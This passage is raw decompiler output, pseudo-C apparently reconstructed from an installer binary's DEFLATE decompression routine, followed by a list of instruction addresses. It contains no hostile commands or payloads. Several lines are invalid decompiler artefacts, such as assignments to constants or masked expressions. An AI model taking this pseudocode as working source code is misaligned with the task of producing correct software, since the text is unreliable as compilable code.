              											__eax = __esi[5];
              											__esi[2] = __esi[5];
              											 *__esi = 1;
              											goto L102;
              										case 1:
              											L102:
              											__eax = __esi[3];
              											while(1) {
              												L105:
              												__eflags = __ebx - __eax;
              												if(__ebx >= __eax) {
              													break;
              												}
              												L103:
              												__eflags =  *(__ebp - 0x34);
              												if( *(__ebp - 0x34) == 0) {
              													goto L182;
              												}
              												L104:
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
              												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
              												__ecx = __ebx;
              												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
              												__ebx = __ebx + 8;
              												__eflags = __ebx;
              											}
              											L106:
              											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
              											__eax = __eax &  *(__ebp - 0x40);
              											__ecx = __esi[2];
              											__eax = __esi[2] + __eax * 4;
              											__ecx =  *(__eax + 1) & 0x000000ff;
              											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
              											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
              											__ecx =  *__eax & 0x000000ff;
              											__eflags = __ecx;
              											if(__ecx != 0) {
              												L108:
              												__eflags = __cl & 0x00000010;
              												if((__cl & 0x00000010) == 0) {
              													L110:
              													__eflags = __cl & 0x00000040;
              													if((__cl & 0x00000040) == 0) {
              														goto L125;
              													}
              													L111:
              													__eflags = __cl & 0x00000020;
              													if((__cl & 0x00000020) == 0) {
              														goto L9;
              													}
              													L112:
              													 *__esi = 7;
              													goto L180;
              												}
              												L109:
              												__esi[2] = __ecx;
              												__esi[1] = __eax;
              												 *__esi = 2;
              												goto L180;
              											}
              											L107:
              											__esi[2] = __eax;
              											 *__esi = 6;
              											goto L180;
              										case 2:
              											L113:
              											__eax = __esi[2];
              											while(1) {
              												L116:
              												__eflags = __ebx - __eax;
              												if(__ebx >= __eax) {
              													break;
              												}
              												L114:
              												__eflags =  *(__ebp - 0x34);
              												if( *(__ebp - 0x34) == 0) {
              													goto L182;
              												}
              												L115:
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
              												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
              												__ecx = __ebx;
              												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
              												__ebx = __ebx + 8;
              												__eflags = __ebx;
              											}
              											L117:
              											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
              											__esi[1] = __esi[1] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
              											__ecx = __eax;
              											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
              											__ebx = __ebx - __eax;
              											__eflags = __ebx;
              											__eax = __esi[4] & 0x000000ff;
              											__esi[3] = __esi[4] & 0x000000ff;
              											__eax = __esi[6];
              											__esi[2] = __esi[6];
              											 *__esi = 3;
              											goto L118;
              										case 3:
              											L118:
              											__eax = __esi[3];
              											while(1) {
              												L121:
              												__eflags = __ebx - __eax;
              												if(__ebx >= __eax) {
              													break;
              												}
              												L119:
              												__eflags =  *(__ebp - 0x34);
              												if( *(__ebp - 0x34) == 0) {
              													goto L182;
              												}
              												L120:
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
              												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
              												__ecx = __ebx;
              												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
              												__ebx = __ebx + 8;
              												__eflags = __ebx;
              											}
              											L122:
              											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
              											__eax = __eax &  *(__ebp - 0x40);
              											__ecx = __esi[2];
              											__eax = __esi[2] + __eax * 4;
              											__ecx =  *(__eax + 1) & 0x000000ff;
              											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
              											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
              											__ecx =  *__eax & 0x000000ff;
              											__eflags = __cl & 0x00000010;
              											if((__cl & 0x00000010) == 0) {
              												L124:
              												__eflags = __cl & 0x00000040;
              												if((__cl & 0x00000040) != 0) {
              													goto L9;
              												}
              												L125:
              												__esi[3] = __ecx;
              												__ecx =  *(__eax + 2) & 0x0000ffff;
              												__esi[2] = __eax;
              												goto L180;
              											}
              											L123:
              											__esi[2] = __ecx;
              											__esi[3] = __eax;
              											 *__esi = 4;
              											goto L180;
              										case 4:
              											L126:
              											__eax = __esi[2];
              											while(1) {
              												L129:
              												__eflags = __ebx - __eax;
              												if(__ebx >= __eax) {
              													break;
              												}
              												L127:
              												__eflags =  *(__ebp - 0x34);
              												if( *(__ebp - 0x34) == 0) {
              													goto L182;
              												}
              												L128:
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
              												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
              												__ecx = __ebx;
              												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
              												__ebx = __ebx + 8;
              												__eflags = __ebx;
              											}
              											L130:
              											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
              											__esi[3] = __esi[3] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
              											__ecx = __eax;
              											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
              											__ebx = __ebx - __eax;
              											__eflags = __ebx;
              											 *__esi = 5;
              											goto L131;
              										case 5:
              											L131:
              											__eax =  *(__ebp - 0x30);
              											__edx = __esi[3];
              											__eax = __eax - __esi;
              											__ecx = __eax - __esi - 0x1ba0;
              											__eflags = __eax - __esi - 0x1ba0 - __edx;
              											if(__eax - __esi - 0x1ba0 >= __edx) {
              												__ecx = __eax;
              												__ecx = __eax - __edx;
              												__eflags = __ecx;
              											} else {
              												__esi[0x26e8] = __esi[0x26e8] - __edx;
              												__ecx = __esi[0x26e8] - __edx - __esi;
              												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
              											}
              											__eflags = __esi[1];
              											 *(__ebp - 0x20) = __ecx;
              											if(__esi[1] != 0) {
              												L135:
              												__edi =  *(__ebp - 0x2c);
              												do {
              													L136:
              													__eflags = __edi;
              													if(__edi != 0) {
              														goto L152;
              													}
              													L137:
              													__edi = __esi[0x26e8];
              													__eflags = __eax - __edi;
              													if(__eax != __edi) {
              														L143:
              														__esi[0x26ea] = __eax;
              														__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
              														__eax = __esi[0x26ea];
              														__ecx = __esi[0x26e9];
              														__eflags = __eax - __ecx;
              														 *(__ebp - 0x30) = __eax;
              														if(__eax >= __ecx) {
              															__edi = __esi[0x26e8];
              															__edi = __esi[0x26e8] - __eax;
              															__eflags = __edi;
              														} else {
              															__ecx = __ecx - __eax;
              															__edi = __ecx - __eax - 1;
              														}
              														__edx = __esi[0x26e8];
              														__eflags = __eax - __edx;
              														 *(__ebp - 8) = __edx;
              														if(__eax == __edx) {
              															__edx =  &(__esi[0x6e8]);
              															__eflags = __ecx - __edx;
              															if(__ecx != __edx) {
              																__eax = __edx;
              																__eflags = __eax - __ecx;
              																 *(__ebp - 0x30) = __eax;
              																if(__eax >= __ecx) {
              																	__edi =  *(__ebp - 8);
              																	__edi =  *(__ebp - 8) - __eax;
              																	__eflags = __edi;
              																} else {
              																	__ecx = __ecx - __eax;
              																	__edi = __ecx;
              																}
              															}
              														}
              														__eflags = __edi;
              														if(__edi == 0) {
              															goto L183;
              														} else {
              															goto L152;
              														}
              													}
              													L138:
              													__ecx = __esi[0x26e9];
              													__edx =  &(__esi[0x6e8]);
              													__eflags = __ecx - __edx;
              													if(__ecx == __edx) {
              														goto L143;
              													}
              													L139:
              													__eax = __edx;
              													__eflags = __eax - __ecx;
              													if(__eax >= __ecx) {
              														__edi = __edi - __eax;
              														__eflags = __edi;
              													} else {
              														__ecx = __ecx - __eax;
              														__edi = __ecx;
              													}
              													__eflags = __edi;
              													if(__edi == 0) {
              														goto L143;
              													}
              													L152:
              													__ecx =  *(__ebp - 0x20);
              													 *__eax =  *__ecx;
              													__eax = __eax + 1;
              													__ecx = __ecx + 1;
              													__edi = __edi - 1;
              													__eflags = __ecx - __esi[0x26e8];
              													 *(__ebp - 0x30) = __eax;
              													 *(__ebp - 0x20) = __ecx;
              													 *(__ebp - 0x2c) = __edi;
              													if(__ecx == __esi[0x26e8]) {
              														__ecx =  &(__esi[0x6e8]);
              														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
              													}
              													_t357 =  &(__esi[1]);
              													 *_t357 = __esi[1] - 1;
              													__eflags =  *_t357;
              												} while ( *_t357 != 0);
              											}
              											goto L23;
              										case 6:
              											L156:
              											__eax =  *(__ebp - 0x2c);
              											__edi =  *(__ebp - 0x30);
              											__eflags = __eax;
              											if(__eax != 0) {
              												L172:
              												__cl = __esi[2];
              												 *__edi = __cl;
              												__edi = __edi + 1;
              												__eax = __eax - 1;
              												 *(__ebp - 0x30) = __edi;
              												 *(__ebp - 0x2c) = __eax;
              												goto L23;
              											}
              											L157:
              											__ecx = __esi[0x26e8];
              											__eflags = __edi - __ecx;
              											if(__edi != __ecx) {
              												L163:
              												__esi[0x26ea] = __edi;
              												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
              												__edi = __esi[0x26ea];
              												__ecx = __esi[0x26e9];
              												__eflags = __edi - __ecx;
              												 *(__ebp - 0x30) = __edi;
              												if(__edi >= __ecx) {
              													__eax = __esi[0x26e8];
              													__eax = __esi[0x26e8] - __edi;
              													__eflags = __eax;
              												} else {
              													__ecx = __ecx - __edi;
              													__eax = __ecx - __edi - 1;
              												}
              												__edx = __esi[0x26e8];
              												__eflags = __edi - __edx;
              												 *(__ebp - 8) = __edx;
              												if(__edi == __edx) {
              													__edx =  &(__esi[0x6e8]);
              													__eflags = __ecx - __edx;
              													if(__ecx != __edx) {
              														__edi = __edx;
              														__eflags = __edi - __ecx;
              														 *(__ebp - 0x30) = __edi;
              														if(__edi >= __ecx) {
              															__eax =  *(__ebp - 8);
              															__eax =  *(__ebp - 8) - __edi;
              															__eflags = __eax;
              														} else {
              															__ecx = __ecx - __edi;
              															__eax = __ecx;
              														}
              													}
              												}
              												__eflags = __eax;
              												if(__eax == 0) {
              													goto L183;
              												} else {
              													goto L172;
              												}
              											}
              											L158:
              											__eax = __esi[0x26e9];
              											__edx =  &(__esi[0x6e8]);
              											__eflags = __eax - __edx;
              											if(__eax == __edx) {
              												goto L163;
              											}
              											L159:
              											__edi = __edx;
              											__eflags = __edi - __eax;
              											if(__edi >= __eax) {
              												__ecx = __ecx - __edi;
              												__eflags = __ecx;
              												__eax = __ecx;
              											} else {
              												__eax = __eax - __edi;
              												__eax = __eax - 1;
              											}
              											__eflags = __eax;
              											if(__eax != 0) {
              												goto L172;
              											} else {
              												goto L163;
              											}
              										case 7:
              											L173:
              											__eflags = __ebx - 7;
              											if(__ebx > 7) {
              												__ebx = __ebx - 8;
              												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
              												_t380 = __ebp - 0x38;
              												 *_t380 =  *(__ebp - 0x38) - 1;
              												__eflags =  *_t380;
              											}
              											goto L175;
              										case 8:
              											L4:
              											while(_t425 < 3) {
              												if( *(_t448 - 0x34) == 0) {
              													goto L182;
              												} else {
              													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
              													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
              													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
              													_t425 = _t425 + 8;
              													continue;
              												}
              											}
              											_t425 = _t425 - 3;
              											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
              											_t406 =  *(_t448 - 0x40) & 0x00000007;
              											asm("sbb ecx, ecx");
              											_t408 = _t406 >> 1;
              											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
              											if(_t408 == 0) {
              												L24:
              												 *_t446 = 9;
              												_t436 = _t425 & 0x00000007;
              												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
              												_t425 = _t425 - _t436;
              												goto L180;
              											}
              											L6:
              											_t411 = _t408 - 1;
              											if(_t411 == 0) {
              												L13:
              												__eflags =  *0x42dbb8;
              												if( *0x42dbb8 != 0) {
              													L22:
              													_t412 =  *0x40942c; // 0x9
              													_t446[4] = _t412;
              													_t413 =  *0x409430; // 0x5
              													_t446[4] = _t413;
              													_t414 =  *0x42ca34; // 0x0
              													_t446[5] = _t414;
              													_t415 =  *0x42ca30; // 0x0
              													_t446[6] = _t415;
              													L23:
              													 *_t446 =  *_t446 & 0x00000000;
              													goto L180;
              												} else {
              													_t26 = _t448 - 8;
              													 *_t26 =  *(_t448 - 8) & 0x00000000;
              													__eflags =  *_t26;
              													_t416 = 0x42ca38;
              													goto L15;
              													L20:
              													 *_t416 = _t438;
              													_t416 = _t416 + 4;
              													__eflags = _t416 - 0x42ceb8;
              													if(_t416 < 0x42ceb8) {
              														L15:
              														__eflags = _t416 - 0x42cc74;
              														_t438 = 8;
              														if(_t416 > 0x42cc74) {
              															__eflags = _t416 - 0x42ce38;
              															if(_t416 >= 0x42ce38) {
              																__eflags = _t416 - 0x42ce98;
              																if(_t416 < 0x42ce98) {
              																	_t438 = 7;
              																}
              															} else {
              																_t438 = 9;
              															}
              														}
              														goto L20;
              													} else {
              														E00406B2B(0x42ca38, 0x120, 0x101, 0x4073fc, 0x40743c, 0x42ca34, 0x40942c, 0x42d338, _t448 - 8);
              														_push(0x1e);
              														_pop(_t440);
              														_push(5);
              														_pop(_t419);
              														memset(0x42ca38, _t419, _t440 << 2);
              														_t450 = _t450 + 0xc;
              														_t442 = 0x42ca38 + _t440;
              														E00406B2B(0x42ca38, 0x1e, 0, 0x40747c, 0x4074b8, 0x42ca30, 0x409430, 0x42d338, _t448 - 8);
              														 *0x42dbb8 =  *0x42dbb8 + 1;
              														__eflags =  *0x42dbb8;
              														goto L22;
              													}
              												}
              											}
              											L7:
              											_t423 = _t411 - 1;
              											if(_t423 == 0) {
              												 *_t446 = 0xb;
              												goto L180;
              											}
              											L8:
              											if(_t423 != 1) {
              												goto L180;
              											}
              											goto L9;
              										case 9:
              											while(1) {
              												L27:
              												__eflags = __ebx - 0x10;
              												if(__ebx >= 0x10) {
              													break;
              												}
              												L25:
              												__eflags =  *(__ebp - 0x34);
              												if( *(__ebp - 0x34) == 0) {
              													goto L182;
              												}
              												L26:
              												__eax =  *(__ebp - 0x38);
              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
              												__ecx = __ebx;
              												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
              												__ebx = __ebx + 8;
              												__eflags = __ebx;
              											}
              											L28:
              											__eax =  *(__ebp - 0x40);
              											__ebx = 0;
              											__eax =  *(__ebp - 0x40) & 0x0000ffff;
              											 *(__ebp - 0x40) = 0;
              											__eflags = __eax;
              											__esi[1] = __eax;
              											if(__eax == 0) {
              												goto L53;
              											}
              											L29:
              											_push(0xa);
              											_pop(__eax);
              											goto L54;
              										case 0xa:
              											L30:
              											__eflags =  *(__ebp - 0x34);
              											if( *(__ebp - 0x34) == 0) {
              												goto L182;
              											}
              											L31:
              											__eax =  *(__ebp - 0x2c);
              											__eflags = __eax;
              											if(__eax != 0) {
              												L48:
              												__eflags = __eax -  *(__ebp - 0x34);
              												if(__eax >=  *(__ebp - 0x34)) {
              													__eax =  *(__ebp - 0x34);
              												}
              												__ecx = __esi[1];
              												__eflags = __ecx - __eax;
              												__edi = __ecx;
              												if(__ecx >= __eax) {
              													__edi = __eax;
              												}
              												__eax = E0040585F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
              												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
              												_t80 =  &(__esi[1]);
              												 *_t80 = __esi[1] - __edi;
              												__eflags =  *_t80;
              												if( *_t80 == 0) {
              													L53:
              													__eax = __esi[0x145];
              													L54:
              													 *__esi = __eax;
              												}
              												goto L180;
              											}
              											L32:
              											__ecx = __esi[0x26e8];
              											__edx =  *(__ebp - 0x30);
              											__eflags = __edx - __ecx;
              											if(__edx != __ecx) {
              												L38:
              												__esi[0x26ea] = __edx;
              												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
              												__edx = __esi[0x26ea];
              												__ecx = __esi[0x26e9];
              												__eflags = __edx - __ecx;
              												 *(__ebp - 0x30) = __edx;
              												if(__edx >= __ecx) {
              													__eax = __esi[0x26e8];
              													__eax = __esi[0x26e8] - __edx;
              													__eflags = __eax;
              												} else {
              													__ecx = __ecx - __edx;
              													__eax = __ecx - __edx - 1;
              												}
              												__edi = __esi[0x26e8];
              												 *(__ebp - 0x2c) = __eax;
              												__eflags = __edx - __edi;
              												if(__edx == __edi) {
              													__edx =  &(__esi[0x6e8]);
              													__eflags = __edx - __ecx;
              													if(__eflags != 0) {
              														 *(__ebp - 0x30) = __edx;
              														if(__eflags >= 0) {
              															__edi = __edi - __edx;
              															__eflags = __edi;
              															__eax = __edi;
              														} else {
              															__ecx = __ecx - __edx;
              															__eax = __ecx;
              														}
              														 *(__ebp - 0x2c) = __eax;
              													}
              												}
              												__eflags = __eax;
              												if(__eax == 0) {
              													goto L183;
              												} else {
              													goto L48;
              												}
              											}
              											L33:
              											__eax = __esi[0x26e9];
              											__edi =  &(__esi[0x6e8]);
              											__eflags = __eax - __edi;
              											if(__eax == __edi) {
              												goto L38;
              											}
              											L34:
              											__edx = __edi;
              											__eflags = __edx - __eax;
              											 *(__ebp - 0x30) = __edx;
              											if(__edx >= __eax) {
              												__ecx = __ecx - __edx;
              												__eflags = __ecx;
              												__eax = __ecx;
              											} else {
              												__eax = __eax - __edx;
              												__eax = __eax - 1;
              											}
              											__eflags = __eax;
              											 *(__ebp - 0x2c) = __eax;
              											if(__eax != 0) {
              												goto L48;
              											} else {
              												goto L38;
              											}
              										case 0xb:
              											goto L56;
              										case 0xc:
              											L60:
              											__esi[1] = __esi[1] >> 0xa;
              											__eax = (__esi[1] >> 0xa) + 4;
              											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
              												goto L68;
              											}
              											goto L61;
              										case 0xd:
              											while(1) {
              												L93:
              												__eax = __esi[1];
              												__ecx = __esi[2];
              												__edx = __eax;
              												__eax = __eax & 0x0000001f;
              												__edx = __edx >> 5;
              												__eax = __edx + __eax + 0x102;
              												__eflags = __esi[2] - __eax;
              												if(__esi[2] >= __eax) {
              													break;
              												}
              												L73:
              												__eax = __esi[0x143];
              												while(1) {
              													L76:
              													__eflags = __ebx - __eax;
              													if(__ebx >= __eax) {
              														break;
              													}
              													L74:
              													__eflags =  *(__ebp - 0x34);
              													if( *(__ebp - 0x34) == 0) {
              														goto L182;
              													}
              													L75:
              													__ecx =  *(__ebp - 0x38);
              													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
              													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
              													__ecx = __ebx;
              													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
              													__ebx = __ebx + 8;
              													__eflags = __ebx;
              												}
              												L77:
              												__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
              												__eax = __eax &  *(__ebp - 0x40);
              												__ecx = __esi[0x144];
              												__eax = __esi[0x144] + __eax * 4;
              												__edx =  *(__eax + 1) & 0x000000ff;
              												__eax =  *(__eax + 2) & 0x0000ffff;
              												__eflags = __eax - 0x10;
              												 *(__ebp - 0x14) = __eax;
              												if(__eax >= 0x10) {
              													L79:
              													__eflags = __eax - 0x12;
              													if(__eax != 0x12) {
              														__eax = __eax + 0xfffffff2;
              														 *(__ebp - 8) = 3;
              													} else {
              														_push(7);
              														 *(__ebp - 8) = 0xb;
              														_pop(__eax);
              													}
              													while(1) {
              														L84:
              														__ecx = __eax + __edx;
              														__eflags = __ebx - __eax + __edx;
              														if(__ebx >= __eax + __edx) {
              															break;
              														}
              														L82:
              														__eflags =  *(__ebp - 0x34);
              														if( *(__ebp - 0x34) == 0) {
              															goto L182;
              														}
              														L83:
              														__ecx =  *(__ebp - 0x38);
              														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
              														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
              														__ecx = __ebx;
              														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
              														__ebx = __ebx + 8;
              														__eflags = __ebx;
              													}
              													L85:
              													__ecx = __edx;
              													__ebx = __ebx - __edx;
              													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
              													 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
              													__edx =  *(__ebp - 8);
              													__ebx = __ebx - __eax;
              													__edx =  *(__ebp - 8) + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
              													__ecx = __eax;
              													__eax = __esi[1];
              													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
              													__ecx = __esi[2];
              													__eax = __eax >> 5;
              													__edi = __eax >> 0x00000005 & 0x0000001f;
              													__eax = __eax & 0x0000001f;
              													__eax = __edi + __eax + 0x102;
              													__edi = __edx + __ecx;
              													__eflags = __edx + __ecx - __eax;
              													if(__edx + __ecx > __eax) {
              														goto L9;
              													}
              													L86:
              													__eflags =  *(__ebp - 0x14) - 0x10;
              													if( *(__ebp - 0x14) != 0x10) {
              														L89:
              														__edi = 0;
              														__eflags = 0;
              														L90:
              														__eax = __esi + 0xc + __ecx * 4;
              														do {
              															L91:
              															 *__eax = __edi;
              															__ecx = __ecx + 1;
              															__eax = __eax + 4;
              															__edx = __edx - 1;
              															__eflags = __edx;
              														} while (__edx != 0);
              														__esi[2] = __ecx;
              														continue;
              													}
              													L87:
              													__eflags = __ecx - 1;
              													if(__ecx < 1) {
              														goto L9;
              													}
              													L88:
              													__edi =  *(__esi + 8 + __ecx * 4);
              													goto L90;
              												}
              												L78:
              												__ecx = __edx;
              												__ebx = __ebx - __edx;
              												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
              												__ecx = __esi[2];
              												 *(__esi + 0xc + __esi[2] * 4) = __eax;
              												__esi[2] = __esi[2] + 1;
              											}
              											L94:
              											__eax = __esi[1];
              											__esi[0x144] = __esi[0x144] & 0x00000000;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
              											__edi = __eax;
              											__eax = __eax >> 5;
              											__edi = __edi & 0x0000001f;
              											__ecx = 0x101;
              											__eax = __eax & 0x0000001f;
              											__edi = __edi + 0x101;
              											__eax = __eax + 1;
              											__edx = __ebp - 0xc;
              											 *(__ebp - 0x14) = __eax;
              											 &(__esi[0x148]) = __ebp - 4;
              											 *(__ebp - 4) = 9;
              											__ebp - 0x18 =  &(__esi[3]);
              											 *(__ebp - 0x10) = 6;
              											__eax = E00406B2B( &(__esi[3]), __edi, 0x101, 0x4073fc, 0x40743c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
              											__eflags =  *(__ebp - 4);
              											if( *(__ebp - 4) == 0) {
              												__eax = __eax | 0xffffffff;
              												__eflags = __eax;
              											}
              											__eflags = __eax;
              											if(__eax != 0) {
              												goto L9;
              											} else {
              												L97:
              												__ebp - 0xc =  &(__esi[0x148]);
              												__ebp - 0x10 = __ebp - 0x1c;
              												__eax = __esi + 0xc + __edi * 4;
              												__eax = E00406B2B(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40747c, 0x4074b8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
              												__eflags = __eax;
              												if(__eax != 0) {
              													goto L9;
              												}
              												L98:
              												__eax =  *(__ebp - 0x10);
              												__eflags =  *(__ebp - 0x10);
              												if( *(__ebp - 0x10) != 0) {
              													L100:
              													__cl =  *(__ebp - 4);
              													 *__esi =  *__esi & 0x00000000;
              													__eflags =  *__esi;
              													__esi[4] = __al;
              													__eax =  *(__ebp - 0x18);
              													__esi[5] =  *(__ebp - 0x18);
              													__eax =  *(__ebp - 0x1c);
              													__esi[4] = __cl;
              													__esi[6] =  *(__ebp - 0x1c);
              													goto L101;
              												}
              												L99:
              												__eflags = __edi - 0x101;
              												if(__edi > 0x101) {
              													goto L9;
              												}
              												goto L100;
              											}
              										case 0xe:
              											goto L9;
              										case 0xf:
              											L175:
              											__eax =  *(__ebp - 0x30);
              											__esi[0x26ea] =  *(__ebp - 0x30);
              											__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
              											__ecx = __esi[0x26ea];
              											__edx = __esi[0x26e9];
              											__eflags = __ecx - __edx;
              											 *(__ebp - 0x30) = __ecx;
              											if(__ecx >= __edx) {
              												__eax = __esi[0x26e8];
              												__eax = __esi[0x26e8] - __ecx;
              												__eflags = __eax;
              											} else {
              												__edx = __edx - __ecx;
              												__eax = __edx - __ecx - 1;
              											}
              											__eflags = __ecx - __edx;
              											 *(__ebp - 0x2c) = __eax;
              											if(__ecx != __edx) {
              												L183:
              												__edi = 0;
              												goto L10;
              											} else {
              												L179:
              												__eax = __esi[0x145];
              												__eflags = __eax - 8;
              												 *__esi = __eax;
              												if(__eax != 8) {
              													L184:
              													0 = 1;
              													goto L10;
              												}
              												goto L180;
              											}
              									}
              								}
              								L181:
              								goto L9;
              							}
              							L70:
              							if( *__edi == __eax) {
              								goto L72;
              							}
              							L71:
              							__esi[2] = __esi[2] & __eax;
              							 *__esi = 0xd;
              							goto L93;
              						}
              					}
              				}
              				L182:
              				_t443 = 0;
              				_t446[0x147] =  *(_t448 - 0x40);
              				_t446[0x146] = _t425;
              				( *(_t448 + 8))[1] = 0;
              				goto L11;
              			}









              0x004065ae
              0x004065b0
              0x00000000
              0x00000000
              0x00406484
              0x00406484
              0x004064ac
              0x004064ac
              0x004064ac
              0x004064ae
              0x00000000
              0x00000000
              0x0040648c
              0x0040648c
              0x00406490
              0x00000000
              0x00000000
              0x00406496
              0x00406496
              0x00406499
              0x0040649c
              0x0040649f
              0x004064a1
              0x004064a3
              0x004064a6
              0x004064a9
              0x004064a9
              0x004064a9
              0x004064b0
              0x004064b0
              0x004064b8
              0x004064bb
              0x004064c1
              0x004064c4
              0x004064c8
              0x004064cc
              0x004064cf
              0x004064d2
              0x004064ea
              0x004064ea
              0x004064ed
              0x004064fb
              0x004064fe
              0x004064ef
              0x004064ef
              0x004064f1
              0x004064f8
              0x004064f8
              0x00406527
              0x00406527
              0x00406527
              0x0040652a
              0x0040652c
              0x00000000
              0x00000000
              0x00406507
              0x00406507
              0x0040650b
              0x00000000
              0x00000000
              0x00406511
              0x00406511
              0x00406514
              0x00406517
              0x0040651a
              0x0040651c
              0x0040651e
              0x00406521
              0x00406524
              0x00406524
              0x00406524
              0x0040652e
              0x0040652e
              0x00406530
              0x00406532
              0x0040653d
              0x00406540
              0x00406543
              0x00406545
              0x00406547
              0x00406549
              0x0040654c
              0x0040654f
              0x00406554
              0x00406557
              0x0040655a
              0x0040655d
              0x00406564
              0x00406567
              0x00406569
              0x00000000
              0x00000000
              0x0040656f
              0x0040656f
              0x00406573
              0x00406584
              0x00406584
              0x00406584
              0x00406586
              0x00406586
              0x0040658a
              0x0040658a
              0x0040658a
              0x0040658c
              0x0040658d
              0x00406590
              0x00406590
              0x00406590
              0x00406593
              0x00000000
              0x00406593
              0x00406575
              0x00406575
              0x00406578
              0x00000000
              0x00000000
              0x0040657e
              0x0040657e
              0x00000000
              0x0040657e
              0x004064d4
              0x004064d4
              0x004064d6
              0x004064d8
              0x004064db
              0x004064de
              0x004064e2
              0x004064e2
              0x004065b6
              0x004065b6
              0x004065b9
              0x004065c0
              0x004065c4
              0x004065c6
              0x004065c9
              0x004065cc
              0x004065d1
              0x004065d4
              0x004065d6
              0x004065d7
              0x004065da
              0x004065e5
              0x004065e8
              0x004065ff
              0x00406604
              0x0040660b
              0x00406610
              0x00406614
              0x00406616
